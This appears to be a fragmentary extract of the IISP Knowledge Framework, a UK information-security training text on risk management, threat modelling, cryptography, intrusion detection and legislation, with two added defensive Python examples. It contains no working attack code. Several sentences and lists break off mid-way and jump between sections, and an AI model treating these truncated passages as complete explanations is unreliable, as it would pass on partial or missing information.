1.1. Purpose
This document contains the IISP Knowledge Framework. It builds upon the IISP Skills Framework version
2.1 and sets out in detail the knowledge that a practitioner should have at Levels 1 and 2.
The definitions of these two levels are as follows:
Level 1: (Knowledge) Basic knowledge of principles/follow good user practice
Has acquired and can demonstrate basic knowledge associated with the skill, e.g. through training
or self-tuition.
Knowledge
Has acquired and can demonstrate the basic knowledge associated with the skill, for example has
attended a training course or completed an academic module in the skill. Understands how the
skill should be applied.
Practice
Can explain the principles of the skill and how it should be applied. This might include experience
of applying the skill to basic tasks in a training or academic environment, for example through
participation in syndicate exercises, undertaking practical exercises in using the skill, and/or
passing a test or examination. Should be aware of recent developments in the skill.
[Figure 1 - Skills Framework, Knowledge Framework and Cyber Security Body of Knowledge Relationship: the Skills Framework leads to the Knowledge Framework, which provides topical access that expands into External Bodies of Knowledge, Standards etc, collectively the Cyber Security Body of Knowledge.]
“Topical access” in this sense means providing access to up to date information of immediate relevance,
interest, or importance which expands upon the information contained in the Knowledge Framework.
Level 1 and Level 2 information is contained within the Knowledge Framework, whilst Level 3 and above
knowledge is contained in the “Cyber Security Body of Knowledge” (CyBOK). The CyBOK should be
considered as a logical construct. It contains all the standards, laws, regulations, papers and other
reference material that the Knowledge Framework provides topical access to.
• Knowledge Areas – provides an overview of each Knowledge Area and then topical references to
external documents and standards. Each Knowledge Area is then sub-divided into sub-areas.
• Knowledge Levels – provides an overview of each of the Skill Areas and then defines the knowledge
and practices required for Levels 1 and 2.
The second part of the Knowledge Framework contains references, namely
• Common Terms – definitions of a wide range of common terms used in Cyber and Information
Security. When a common term is used in the Knowledge Area and Knowledge Levels sections it is
hyperlinked to this section.
• Abbreviations and Acronyms - a list of abbreviations and acronyms used in the document.
Figure 2 shows the structure of the Knowledge Framework in diagrammatic form.
[Figure 2 - Structure of the Knowledge Framework: Part 1 (Knowledge Areas and Knowledge Levels) provides topical access to External Bodies of Knowledge, Standards etc, i.e. the Cyber Security Body of Knowledge; Part 2 (Common Terms and Abbreviations / Acronyms) is reached from Part 1 by hyperlinks.]
In addition the document contains a mind map showing how the Skill Areas in the IISP Skills Framework
map to the Knowledge Areas.
Each one has topical resources and standards to look at for more information. In a few situations it has
not been possible to provide suitable topical references.
[Figure: DETECT - recognise incidents and threats; monitor key areas and activities. RESPOND - rapidly address incidents; mitigate the damage; analyse and learn.]
The overall process of analysing and managing risks is called risk management. The first part of risk
management is called risk assessment. Risk assessment itself is then subdivided into three activities, as
follows:
• Risk identification.
• Risk analysis.
• Risk evaluation.
The purpose of risk identification is to determine what could happen to cause a potential loss, and to
gain insight into how, where and why the loss might happen. Risk identification involves identifying
assets, threats, existing controls, vulnerabilities and business impacts. Threat intelligence can be used to
inform on the threats and vulnerabilities to a system.
The risk identification stage is also sometimes referred to as a business impact analysis (BIA). A BIA
always commences with an understanding of what the organisation’s key assets are. These could
include such things as people, property, systems and information, and each will have some form of
value to the business.
The BIA will then examine the impact of a threat taking place on each of the key assets identified. The
impact can be measured objectively in purely numerical terms such as money or number of customers,
or can be measured more subjectively as high, medium or low. Apart from financial impacts, other
consequences may be on reputation, ability to provide customer service, or the ability to meet legal or
regulatory requirements. It is important that the asset owner within the business is involved in the BIA
as it is they who will have the best view of the asset’s value.
The next stage is risk analysis. This is the process of comprehending the nature of each risk and
determining its level; it provides the basis for risk evaluation and for decisions about risk treatment.
The analysis takes into account the impact on the assets and the likelihood of the threats. Risk analysis
may be undertaken in varying degrees of detail depending on the criticality of the assets, the extent of
known vulnerabilities, and prior incidents in the organisation. A risk analysis methodology may be
qualitative, quantitative, or a combination of the two, depending on the circumstances. The output of
the risk analysis process is a list of risks, each with an assigned level of risk expressed in whichever
(qualitative or quantitative) scale was used.
The final stage of risk assessment is risk evaluation. This is the process of comparing the results of risk
analysis with the risk criteria to determine whether each risk is acceptable or tolerable. At this stage the
analysis indicates which risks are within the organisation's risk appetite and which require treatment to
lower the level of risk to a tolerable level (the level an organisation is prepared to live with is known as
its risk tolerance).
Figure 6 provides an overview of risk management as described above. This type of figure can be found
in two ISO standards, ISO/IEC 27005 and ISO 31000.
Context Establishment is where an organisation articulates its objectives, defines the external and
internal parameters to be taken into account when managing risk, and sets the scope and risk criteria
for the remaining processes, such as risk assessment and risk treatment. During the Context
Establishment phase, all information about the organisation relevant to the information security risk
management context is established. This involves setting the basic criteria necessary such as:
• Risk evaluation criteria.
• Impact criteria.
• Risk acceptance criteria.
It is also used to define the scope and boundaries such as:
• Defining relevant assets.
• Articulating business objectives.
• Setting out the business processes in scope.
• Listing the legal and regulatory requirements applicable to the organisation.
• Interfaces to other organisations, for example where information is exchanged.
Context Establishment should also be used to define and set up an appropriate governance structure.
There are a number of risk management methodologies and methods. Those in widespread use are
provided in the topical references section.
Either ISO/IEC 27005 or ISO 31000 can be used to perform risk management in a business continuity
context. Business Continuity Management (BCM) is focused on keeping an organisation working in the
face of disruptive events. Risk management for BCM is therefore focused on dealing with events that
have a major impact on the organisation. While risk management will consider all threats, BCM risk
management focuses on impacts and on developing a Business Continuity Plan (BCP) to deliver a more
resilient organisation. Many of the business continuity threats to an organisation, whether external or
internal, have similar impacts. For example, a flu pandemic, industrial disputes, transport network
disruption or terrorist action will all have the same impact, namely a loss of people available to work.
The severity of the impact will differ depending on the duration of the disruption. A business continuity
risk assessment should also take into account environmental threats such as flooding and power
outage.
ISO 22301 is the standard that helps organisations put business continuity plans in place to protect
them from, and help them recover from, disruptive incidents when they happen. It also helps identify
potential threats to a business and to build the capacity to deal with unforeseen events. We will talk
more about business continuity in the sections on policies, standards, procedures and incident
management.
Figure 7 illustrates an attack tree. The attacks are represented with a treelike structure that starts with a
root node. In this case it is marked as “Gain Access to System”. The root node has one or more child
conditions that must be true for an attacker to exploit a threat. In turn, any of these child conditions
may have one or more children of their own. Attack trees are quite easy to construct and offer an
overview on the attacks that might be made to a system.
[Figure 7 - Attack tree: root node "Gain Access to System" with child nodes Denial of Service, Eavesdropping, Spoofing (which in turn has the child DNS Spoof), Man in The Middle Attack and Invalid Flow.]
Attack trees can be quite sophisticated. For instance one could annotate each node with whether a
particular attack is possible or impossible, or expensive or inexpensive. Nodes can also be combined
using Boolean logic: at an OR node a successful attack is possible if any of its child nodes occurs,
whereas at an AND node the attack is possible only if all of its child nodes occur. Walking the tree with
these annotations then gives, for example, the cheapest attack available to the adversary and which
leaves a control must remove to make the attack infeasible.
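As an added worked example (not from the original document), the following Python evaluates the Figure 7 tree with the annotations just described: OR and AND nodes, a possible/impossible flag and a cost on each leaf. The node names from the figure are kept; the costs, the feasibility flags and the extra leaves (ARP Spoof, obtaining a network position, forging a trusted TLS certificate) are constructed for illustration only.

```python
import copy
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class Node:
    name: str
    kind: str = "LEAF"                         # "LEAF", "OR" or "AND"
    children: List["Node"] = field(default_factory=list)
    possible: bool = True                      # leaf annotation: can this step be carried out at all?
    cost: int = 0                              # leaf annotation: attacker cost, in constructed units


Attack = Tuple[int, List[str]]                 # (total cost, names of the nodes on the path)


def cheapest_attack(node: Node) -> Optional[Attack]:
    """Cheapest feasible attack rooted at `node`, or None if the whole subtree is impossible.

    OR node:  feasible if any child is feasible; cost is the minimum over the children.
    AND node: feasible only if every child is feasible; cost is the sum over the children.
    """
    if node.kind == "LEAF":
        return (node.cost, [node.name]) if node.possible else None
    results = [cheapest_attack(child) for child in node.children]
    if node.kind == "OR":
        feasible = [r for r in results if r is not None]
        if not feasible:
            return None
        cost, path = min(feasible, key=lambda r: r[0])
        return cost, [node.name] + path
    if node.kind == "AND":
        if any(r is None for r in results):
            return None
        return sum(r[0] for r in results), [node.name] + [n for r in results for n in r[1]]
    raise ValueError(f"unknown node kind {node.kind!r}")


def mitigate(root: Node, leaf_name: str) -> Node:
    """Copy of the tree with every leaf called `leaf_name` marked impossible.

    This is how the effect of a candidate control is evaluated: remove the step it
    prevents and see what the cheapest remaining attack costs."""
    clone = copy.deepcopy(root)
    stack = [clone]
    while stack:
        current = stack.pop()
        if current.kind == "LEAF" and current.name == leaf_name:
            current.possible = False
        stack.extend(current.children)
    return clone


def build_tree() -> Node:
    """The Figure 7 tree; costs and the extra leaves are constructed assumptions."""
    return Node("Gain Access to System", "OR", [
        Node("Denial of Service", cost=40),
        Node("Eavesdropping", "AND", [
            Node("Obtain network position", cost=20),
            Node("Capture unencrypted traffic", cost=5),
        ]),
        Node("Spoofing", "OR", [
            Node("DNS Spoof", cost=15),
            Node("ARP Spoof", cost=10),
        ]),
        Node("Man in The Middle Attack", "AND", [
            Node("DNS Spoof", cost=15),
            Node("Forge trusted TLS certificate", possible=False),   # assumed infeasible
        ]),
        Node("Invalid Flow", cost=30),
    ])


if __name__ == "__main__":
    tree = build_tree()
    print("cheapest attack:", cheapest_attack(tree))
    print("after blocking ARP spoofing:", cheapest_attack(mitigate(tree, "ARP Spoof")))
```

Running it on the constructed tree gives the Spoofing branch via ARP Spoof as the cheapest attack; marking ARP Spoof impossible pushes the adversary to DNS Spoof, and removing that as well leaves Eavesdropping (an AND node whose cost is the sum of its two steps). The Man in The Middle subtree never contributes because one of its AND children is infeasible, which is the Boolean algebra at work.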
The next technique we will look at is called STRIDE which has been produced by Microsoft. It is
supported by the Microsoft SDL Threat Modeling Tool, which we will talk about shortly. STRIDE is
actually a threat classification scheme. STRIDE is an acronym for the following:
• Spoofing – using someone else’s credentials to gain access to otherwise inaccessible assets.
• Tampering – changing data to mount an attack.
• Repudiation – occurs when a user denies performing an action, but the target of the action has no
way to prove otherwise.
• Information disclosure – the disclosure of information to a user who does not have permission to
There are three common techniques used to define and record vulnerabilities; they are:
The National Vulnerability Database (NVD) is a U.S. government repository of standards-based
vulnerability management data. This data enables automation of vulnerability management, security
measurement, and compliance. NVD includes databases of security checklists, security-related software
flaws, misconfigurations, product names, and impact metrics. Each product vulnerability is identified by
a CVE identifier and carries CVSS scores.
Vulnerability management is a comprehensive approach to the development of a system of practices
and processes designed to identify, analyse and address vulnerabilities in hardware or software. It is
specifically designed to proactively mitigate or prevent the exploitation of vulnerabilities which exist in a
system or organisation.
Vulnerability management usually involves the following:
• Planned and regular vulnerability assessments.
• Reviewing and actioning relevant CERT alerts.
• Obtaining and reviewing product vendor reports on vulnerabilities and updates.
• Engaging with operational teams to trigger appropriate patching of software.
• Engaging with architectural teams to implement new technical controls.
• Using threat intelligence to identify new vulnerabilities.
A number of products and services exist to assist organisations in obtaining and processing threat
intelligence.
NIST SP 800-30 – NIST Special Publication 800-30 Revision 1, Guide for Conducting Risk Assessments (September 2012). http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-30r1.pdf
The Open FAIR Body of Knowledge – The Open FAIR Body of Knowledge – A Pocket Guide: A Taxonomy and Method for Risk Analysis. Published by The Open Group (2014). ISBN 978 94 018 0018
Threat Modelling
Name – Description and Location
Attack Trees – https://www.schneier.com/academic/archives/1999/12/attack_trees.html
Threat Modeling: Designing for Security – Adam Shostack. John Wiley & Sons, Inc. ISBN 978-1-118-80999-0
Microsoft SDL Threat Modeling Tool – https://www.microsoft.com/en-us/sdl/adopt/threatmodeling.aspx
Threat Intelligence
Name – Description and Location
MWR InfoSecurity – Threat Intelligence: Collecting, Analysing, Evaluating. Paper produced with the support of CPNI and CERT-UK.
TAXII and STIX – Information Sharing Specifications for Cybersecurity. https://www.us-cert.gov/Information-Sharing-Specifications-Cybersecurity
WARP – https://www.ncsc.gov.uk/articles/what-warp and https://www.warp.gov.uk/about-us/
2.3.1. Governance
Corporate governance refers to the mechanisms, processes and relationships by which organisations are
controlled and directed. Governance structures identify the rights and responsibilities among different
participants in the organisation, such as the board of directors, managers, shareholders, creditors,
auditors, regulators, and other stakeholders. It also includes the rules and procedures for making
decisions in corporate affairs. Information security governance is similar but it is the system by which an
organisation directs and controls information security. It should not be confused with information
security management, which we will cover next. Information security management is concerned with
making decisions to mitigate risks; information security governance is primarily concerned with who is
authorised to make decisions. Information security governance specifies the accountability framework
and provides oversight to ensure that risks are adequately mitigated, while information security
management ensures that security controls are implemented to mitigate risks.
Information security governance is the foundation of an Information Security Management System
(ISMS) as it provides both strategic and operational frameworks. It needs to make sure that its
objectives and strategies align with business objectives and strategies.
Information Security Governance must be viewed as being an integral part of the organisation’s wider
governance structures and mechanisms, such as IT, business continuity, risk management and financial
planning. In particular it must be seen as linking into overall corporate governance, as shown in Figure 9.
ISO/IEC 27014 was published in 2013 and provides guidance on the concepts and principles for the
governance of information security. The standard provides:
“guidance on concepts and principles for the governance of information security, by which
organisations can evaluate, direct, monitor and communicate the information security related
activities within the organisation” and is “applicable to all types and sizes of organisations”.
From ISO/IEC 27014, the principles of information security governance are to:
• Establish organisation-wide information security.
• Adopt a risk based approach.
• Set the direction of investment decisions.
• Ensure conformance with internal and external requirements.
We will look at different types of physical, procedural and technical controls later on in this section.
However, first we will look at architectural aspects of designing security controls into a system and
organisation.
The SABSA model is layered, with the top layer, Contextual Security Architecture, being the business
requirements definition stage. At each lower layer a new level of abstraction and detail is developed,
going through the definition of the conceptual security architecture, logical services architecture,
physical security architecture and finally at the lowest layer, the selection of technologies and products
specified in the component security architecture.
Another ESA of note is The Open Group Architecture Framework (TOGAF). This is actually a framework
for enterprise architecture that provides an approach for designing, planning, implementing, and
governing an enterprise architecture. As of version 9.1, The Open Group has defined how security fits
into the TOGAF methodology. As with SABSA it is business and risk driven.
Both SABSA and TOGAF are very prescriptive; the benefit of this is that they usually produce repeatable
designs.
Note that a Technical Security Architecture will typically include three sub-architectures, namely:
• Infrastructure security architecture.
• Network security architecture.
• Application security architecture.
The NIST Cloud Computing Reference Architecture (Special Publication 500-292) defines five actors.
They include the Cloud Consumer and the Cloud Provider together with three others:
• Cloud Broker: A Cloud Broker acts as an intermediary between the consumer of cloud services and
Cloud Providers. It negotiates relationships between Cloud Providers and Cloud Consumers. A Cloud
Consumer may request cloud services from a Cloud Provider directly or via a Cloud Broker. A Cloud
Broker may create a new service by combining multiple services, potentially from different Cloud
Providers, or by enhancing an existing service.
• Cloud Auditor: A Cloud Auditor is a party that can perform an independent examination of cloud
services, information system operations, performance and security of the cloud implementation.
Audits are performed to verify conformance to standards through review of evidence. The audit
may involve interactions with both the Cloud Consumer and the Cloud Provider. For security
auditing, a Cloud Auditor can make an assessment of the security controls in the information system
to determine the extent to which the controls are implemented correctly, operating as intended,
and producing the desired outcome with respect to the security requirements for the system. The
security auditing could also include the verification of the compliance with regulation and security
policy.
• Cloud Carrier: A Cloud Carrier acts as an intermediary that provides connectivity and transport of
cloud services between Cloud Consumers and Cloud Providers.
Figure 14 illustrates the interrelationships between the actors defined in the NIST reference
architecture.
[Figure 15 - Cloud service models (including Platform as a Service (PaaS)) arranged by level of abstraction against level of control.]
Obviously Figure 15 is a simplification, with Figure 16 showing a more detailed representation. That
figure illustrates the components within each service model and the types of services offered to the
Cloud Consumers.
[Figure 16 - Components within each service model (SaaS shown with Presentation Modality, Presentation Platform, APIs and Applications) and the types of service offered to Cloud Consumers.]
The service model, and the particular Cloud Provider, dictate who is responsible for each part of the
service. This gives rise to an important concept called the shared responsibility model. Typically, a
Cloud Provider will publish its shared responsibility model for a given type of service and service
model. Public cloud adoption requires an organisation to evaluate how its security operational and
assurance processes are applied and validated when cloud services are being consumed. The shared
responsibility model requires organisations to fully understand "who does what" in relation to security
operations. Often the Cloud Provider supplies the technology but the customer retains operational
responsibility for configuring and running it securely, although the split depends on the service model
being used. In a shared responsibility model one needs to consider who is responsible for the following:
[Figure: AWS shared responsibility model. Managed by AWS customers: customer data; customer IAM; platform and application management; operating system, network and firewall configuration; client-side data encryption and data integrity authentication; server-side encryption; network traffic protection. Managed by Amazon Web Services: AWS IAM; compute; storage; databases; networking.]
The Cloud Security Alliance (CSA) is a not-for-profit organisation with a mission to “promote the use of
best practices for providing security assurance within Cloud Computing, and to provide education on
the uses of Cloud Computing to help secure all other forms of computing”. Whilst it was established in
the US it has a number of chapters around the world, including the UK. Their seminal work is the
“Security Guidance for Critical Areas of Focus in Cloud Computing - Foundational best practices for
securing cloud computing”. The document’s intent is to establish a stable, secure baseline for cloud
operations. It describes a set of practices the CSA has put together in 14 domains involved in governing
or operating the cloud, namely:
• Cloud Computing Architectural Framework.
• Governance and Enterprise Risk Management.
• Contracts and Electronic Discovery.
• Compliance and Audit Management.
• Information Management and Data Security.
• Interoperability and Portability.
• Traditional Security, Business Continuity, and Disaster Recovery.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
2.4.11. Cryptography
Before we look at the technical controls we would like to introduce you to cryptography. As many
technical controls are based on cryptography it is important you have some understanding of this
subject.
Cryptography is the science of transforming data, whether it is a message being transmitted or data
residing on a disk, using mathematical operations so that it can only be read by those who hold the right
secret. The word cryptography means literally hidden or secret writing: it involves changing normal
information into another form that hides it and makes it secret. Cryptanalysis means literally untying
something hidden: it involves recovering information that has been hidden by someone else using
cryptography, without being given the secret.
As we go on and explain different forms of cryptography it is useful to define two standard actors used
in describing cryptographic mechanisms. If you ever talk about cryptographic mechanisms it is usual to
refer to the processes using the following actors:
• Alice: she is an end user or computer without malicious intentions. She is one of the main users of
the cryptographic services being explained.
• Bob: he is Alice’s friend and also a main user of the cryptographic services. Like Alice, Bob does not
have any malicious intentions.
There are two forms of encryption and decryption you should be aware of. They are called symmetric
and asymmetric cryptography and use two different types of algorithms. Both these types of algorithms
use cryptographic keys.
In symmetric cryptography the cryptographic keys are just very large randomly generated numbers.
These are called symmetric keys. The size of the key is specified in bits. The key space is the set of all
possible values a key can take; the larger the key space the better, since an attacker who has to try every
key has more work to do. In the case of a 64-bit key, the key space is 2 to the power of 64 (2^64). In other
words, the number of possible values of the key is 18,446,744,073,709,551,616. Different symmetric
algorithms support different key sizes. In most environments it is recommended that you use keys with
a minimum size of 128 bits (i.e. a key space of 2^128).
With this system, the symmetric algorithm transforms the plaintext message into ciphertext. This
transformation involves the symmetric key, being available only to legitimate senders and receivers of
the message. To reverse the process the ciphertext is fed into the symmetric algorithm together with
the symmetric key to recover the plaintext. This process is shown in Figure 19.
The strength of the protection in symmetric cryptography lies in the secrecy of the keys and NOT in the
secrecy of the algorithm (a rule known as Kerckhoffs's principle). This is because most modern commonly
used algorithms are in the public domain and freely available to implement. It is therefore assumed that
attackers have full knowledge of the algorithm. The most widely used symmetric algorithms are:
• Advanced Encryption Standard (AES). AES was originally adopted by the U.S. government and is
now used worldwide. AES supports three different key sizes: 128, 192 and 256 bits.
• Data Encryption Standard (DES). A cipher defined and endorsed by the U.S. government in 1977 as
an official standard. The key size of DES is 56 bits in length. Because of the small size of the key, this
algorithm is now considered insecure for many applications and should not be used.
• Triple DES (3DES). A technique for improving the security of DES is triple encryption, that is,
passing each block through DES three times (encrypt, decrypt, encrypt) under three different DES
keys. Triple DES with three independent keys has a key size of 168 bits (three 56-bit DES keys), but
because a meet-in-the-middle attack can be mounted against this construction the effective security
it provides is only 112 bits. It has since been deprecated by NIST and AES should be used instead.
Asymmetric cryptography requires the user to be provided with two keys, namely a public key and a
private key. As the name implies, the public key is the key that is provided to the world, whilst the private
key is kept by the owner in a safe location. Figure 20 shows the processing of asymmetric cryptography.
In this type of cryptography one of the keys is used, via the asymmetric algorithm, to create the
ciphertext; to recover the original plaintext from the ciphertext the other key is used. Asymmetric
cryptography is often referred to as Public Key Cryptography.
The private key and public key have a mathematical relationship with each other and are generated at
the same time. They are generated using a trapdoor one-way function. This means it is easy to compute
The second use case is shown in Figure 22. In this case Alice uses her private key to encrypt some data
and then sends the ciphertext to Bob. Bob obtains Alice's public key and uses this to decrypt the received
ciphertext from Alice. The two key points about this are:
• Anyone provided with Alice's public key can decrypt the data, so this use case offers no confidentiality.
• Anyone that successfully decrypts the message from Alice can be sure it came from her, as she is the
only entity possessing her private key.
This property of asymmetric algorithms is not actually used for encrypting data; it is used for creating
and verifying digital signatures. Public key encryption (the first use case) is likewise rarely applied to bulk
data, because asymmetric operations are slow, and is mostly used for distributing symmetric keys. We
will talk more about digital signatures shortly.
The most widely used asymmetric algorithms are:
To verify the digital signature the recipient decrypts the digital signature with the sender's public key
(e.g. Alice's) and checks that the hash value recovered matches what they expect. This is achieved by
independently calculating the hash over the received data and comparing it with the hash value just
recovered from the signature.
Content Control
The purpose of content control is to block content entering or leaving an organisation where that
content does not conform to the corporate policy. This is sometimes referred to as content inspection.
The policy could be in place for many reasons, some of which might include:
Cryptographic Services
There is a large number of security controls based on cryptography. Many of these are communications
controls and we will cover them in the Trusted Communications section. In this section we will look at a
few other security controls based on cryptography.
The first one we will look at is the Public Key Infrastructure, which we covered in the cryptography
section. In its purest sense a PKI is used to securely generate and distribute public keys in the form of
public key certificates. The public keys in the certificates can then be used by applications or services to
support cryptographic based controls – such as Virtual Private Networks or secure email. Organisations
can build their own PKIs and there are also a number of public PKIs – many of which are used to secure
public web sites with TLS. We will cover TLS in the Trusted Communications section.
Digital signature services are used to digitally sign a message, document or other information object.
The service is also then used to verify the digital signature. Signature services are typically used in
conjunction with a PKI. You will very rarely find digital signature services by themselves, rather they are
components of a larger offering, such as a service offering digitally signed contracts or other legal
Detection
Detection security controls are designed to detect and possibly block or prevent abnormal behaviour.
Intrusion detection systems are designed to identify that an intrusion has been attempted, is occurring,
or has occurred, and possibly respond. Intrusion prevention systems, however, are designed to identify
and then actually block the attack. There are four variants of these systems:
• Network Intrusion Detection System (NIDS). These products attempt to identify unauthorised, illicit,
and anomalous behaviour based solely on network traffic as it traverses a NIDS sensor. A NIDS
collects the IP packets that traverse a given network using a network tap, a switch SPAN (mirror) port,
or a hub. Using the captured data, the NIDS processes and flags, and optionally reports or alerts on,
any suspicious traffic. The role of a NIDS is passive: it only gathers, identifies, logs and alerts.
• Network Intrusion Prevention System (NIPS). Very similar to a NIDS except this device actually
blocks any traffic it believes to be suspicious. Most network products of this type can be configured
to operate in either NIDS or NIPS mode.
• Host Intrusion Detection System (HIDS). These products attempt to identify unauthorised, illicit,
and anomalous behaviour on a specific device, whether it is a server or workstation. HIDS generally
involves an agent installed on each system, monitoring and alerting on local OS and application
activity. The installed agent uses a combination of signatures, rules, and heuristics to identify
unauthorised activity. Like a NIDS, the role of a HIDS is passive, only gathering, identifying, logging,
and alerting.
• Host Intrusion Prevention System (HIPS). Similar to a HIDS except they can be configured to block
activity. Most products in this space can operate in either HIDS or HIPS mode, and usually on a rule
by rule basis.
Placement of sensors is important in enterprise architectures. NIDS/NIPS products are not able to inspect traffic properly if it is encrypted. For instance, don't place a sensor between web clients and SSL accelerators; instead, place the sensor after the accelerators, where the traffic has been decrypted.
NIDS/NIPS sensors can also be placed in two different types of location. The first is attaching the sensor to a span (mirror) port of a network switch. All traffic coming in and out of the network switch is copied to the span port, so the sensor can view all traffic on that switch. When operating like this the device can only operate in NIDS mode: it sees a copy of the traffic and is unable to block it. The other location is in-line, which means that all network traffic must pass through the device. Hence the device can operate in NIPS mode (and in NIDS mode if configured to do so), as it is now able to block traffic if required. Figure 25 illustrates this point.
Figure 25 - Sensor placement (diagram labels: Span Port, NIDS Sensor, Firewall, Server, Server, Firewall, In-line NIDS/NIPS Sensor)
Implementing an IDS/IPS is not without its problems and requires a highly skilled and trained team to manage it effectively. When first installed you will see many false positives and false negatives, both of which require skilled tuning: normal behaviour may falsely trigger an alert (a false positive), or alerts that should have been raised are not (a false negative). It will take some time to bed down an IPS until it is effective.
File integrity monitoring is a security control that validates the integrity of operating system and application software files. It does this by comparing the current state of each file with a known-good baseline. Should a file change, whether through virus activity or corruption, it will no longer match the integrity information recorded for the original file. Hence the control alerts you, and/or an administrator, to changes in critical system files, application programs, configuration files and content files.
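An added example (not the framework's code) of the baseline-and-compare approach just described: it hashes every regular file under a directory into a baseline, then reports modified, added and removed files. The directory and files built in demo() are constructed for illustration.

```python
"""File integrity monitoring: take a known-good baseline, then compare against it.

Added example, not code from the IISP Knowledge Framework. The directory
layout and file contents used in demo() are constructed.
"""
import hashlib
import os
import tempfile
from typing import Dict, List


def sha256_of_file(path: str) -> str:
    """Stream the file through SHA-256 so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: str) -> Dict[str, str]:
    """Record the known-good state: relative path -> SHA-256 for every regular file.

    Symlinks are skipped so a link pointing outside the tree cannot make an
    unrelated file look like part of the monitored set.
    """
    baseline: Dict[str, str] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_of_file(full)
    return baseline


def compare_to_baseline(root: str, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Report what differs from the baseline.

    'modified': present in both but the hash differs;
    'added':    present now but not in the baseline;
    'removed':  in the baseline but no longer present.
    """
    current = build_baseline(root)
    modified = [p for p in baseline if p in current and current[p] != baseline[p]]
    added = [p for p in current if p not in baseline]
    removed = [p for p in baseline if p not in current]
    return {"modified": sorted(modified), "added": sorted(added), "removed": sorted(removed)}


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a tiny 'system', then tamper with it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "etc", "app.conf"), "w") as fh:
            fh.write("debug=false\n")
        with open(os.path.join(root, "bin", "service"), "wb") as fh:
            fh.write(b"\x7fELF-placeholder")
        baseline = build_baseline(root)

        # Simulated changes: a config edit, a dropped-in file, and a deleted binary.
        with open(os.path.join(root, "etc", "app.conf"), "a") as fh:
            fh.write("debug=true\n")
        with open(os.path.join(root, "bin", "unexpected"), "wb") as fh:
            fh.write(b"not in baseline")
        os.remove(os.path.join(root, "bin", "service"))

        return compare_to_baseline(root, baseline)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```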
The next security control we will discuss is Transport Layer Security (TLS). TLS and its predecessor, Secure Sockets Layer (SSL), both frequently referred to simply as "SSL", are cryptographic protocols used to carry application traffic such as HTTP. They can also carry other types of application traffic, such as email.
The security controls that TLS and SSL provide are as follows:
Design Patterns
Name: Description and Location
OSA: Open Security Architecture. http://www.opensecurityarchitecture.org/cms
O-ESA: Open Enterprise Security Architecture (O-ESA) – A Framework and Template for Policy-Driven Security. The Open Group, 2011. ISBN 978-90-8753-672-5.
Cryptography
Name: Description and Location
Everyday Cryptography: Keith M Martin. Everyday Cryptography. Oxford University Press. Published 2012. ISBN 978-0-19-969559-1
NIST SP 800-175A: NIST Special Publication 800-175A. Guideline for Using Cryptographic Standards in the Federal Government: Directives, Mandates and Policies (August 2016). http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-175A.pdf
NIST SP 800-175B: NIST Special Publication 800-175B. Guideline for Using Cryptographic Standards in the Federal Government: Cryptographic Mechanisms (August 2016). http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-175B.pdf
Internet of Things
Name: Description and Location
IoT Security Foundation: IoT Security Foundation Guidelines. https://iotsecurityfoundation.org/best-practice-guidelines/
OWASP IoT: OWASP Internet of Things Project. https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project
Policies, standards, procedures and guidelines are influenced by relevant legislation, for example the Data Protection Act in the UK. Depending on the industry, the organisation may also need to be compliant with one or more regulations. Contracts between organisations may also call up legislation and regulations that sub-contractors must adhere to.
The relationship between these various artefacts is shown in Figure 27.
2.5.1. Legislation
In this section we go through the primary legislation that affects information security within the UK. Many countries have similar laws. It is not possible in this document to go through all the legislation, or regulations, that might impact a given organisation or industry. Good sources include:
• http://www.legislation.gov.uk/. This contains details of all the Acts and regulations passed by the UK parliament.
• http://eur-lex.europa.eu. EUR-Lex is an official website of European Union law and other public documents of the European Union (EU).
Data Protection Act
The Data Protection Act 1998 (DPA) controls how personal data is used by organisations, businesses or
the government. The DPA defines eight data protection principles, which apply in various contexts, to
ensure that information is processed lawfully. In summary the eight principles are:
• Principle 1: Personal data shall be processed fairly and lawfully.
• Principle 2: Personal data shall be used for limited, specifically stated purposes.
• Principle 3: Personal data shall be adequate, relevant and not excessive in relation to the purpose or
purposes for which they are processed.
• Principle 4: Personal data shall be accurate and, where necessary, kept up to date.
• Principle 5: Personal data shall be kept for no longer than is absolutely necessary.
• Principle 6: Personal data shall be handled according to people's data protection rights.
• Principle 7: Appropriate technical and organisational measures shall be taken against unauthorised
2.5.3. Policies
According to ISO/IEC 27000:2016 a policy is:
In effect a security policy establishes what must be done to protect information, whether it is stored on a computer or on paper. A well-written policy contains sufficient definition of "what" to do so that the "how" can be identified and measured or evaluated. A policy needs management commitment, supporting procedures and an appropriate technical framework within which it can be implemented. It is important that there is a means by which compliance can be checked, and a visible statement of the consequences of the policy being violated.
2.5.4. Standards
An organisation will refer to a number of external security standards or, if they are not appropriate, develop its own. In this section we give you an idea of a few of the security standards that a typical organisation may require. Different business communities and sectors may well have different types of standards; for instance, there are different standards in the defence, public sector, health, retail and finance sectors.
Some of these standards we referred to in the previous section. As with the policies section, the descriptions of the standards are not meant to be complete, but rather are intended to give you an idea of some of the topics they address. Many of these standards will have an associated procedure containing specific instructions for performing some function or action in order to be compliant with the standard.
Audit and Logging Standard
This standard defines what audit events are logged and when. For instance you may require that
applications log access to every single record in a database when it contains personal data – and this
would include both read and write access. Some other examples are:
• User authentication and authorisation such as user login and logout
